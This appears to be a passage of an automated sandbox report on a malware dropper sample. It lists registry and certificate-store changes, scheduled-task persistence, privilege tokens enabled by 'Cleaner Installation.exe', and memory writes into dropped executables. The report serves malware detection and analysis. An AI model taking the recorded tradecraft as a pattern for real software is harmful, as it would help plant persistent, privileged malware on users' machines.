Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2556 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
PID 2556 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
PID 2556 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
PID 2556 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
PID 2556 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 2556 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 2556 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 2556 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 2556 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\inst001.exe
PID 2556 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\inst001.exe
PID 2556 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\inst001.exe
PID 2556 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\inst001.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
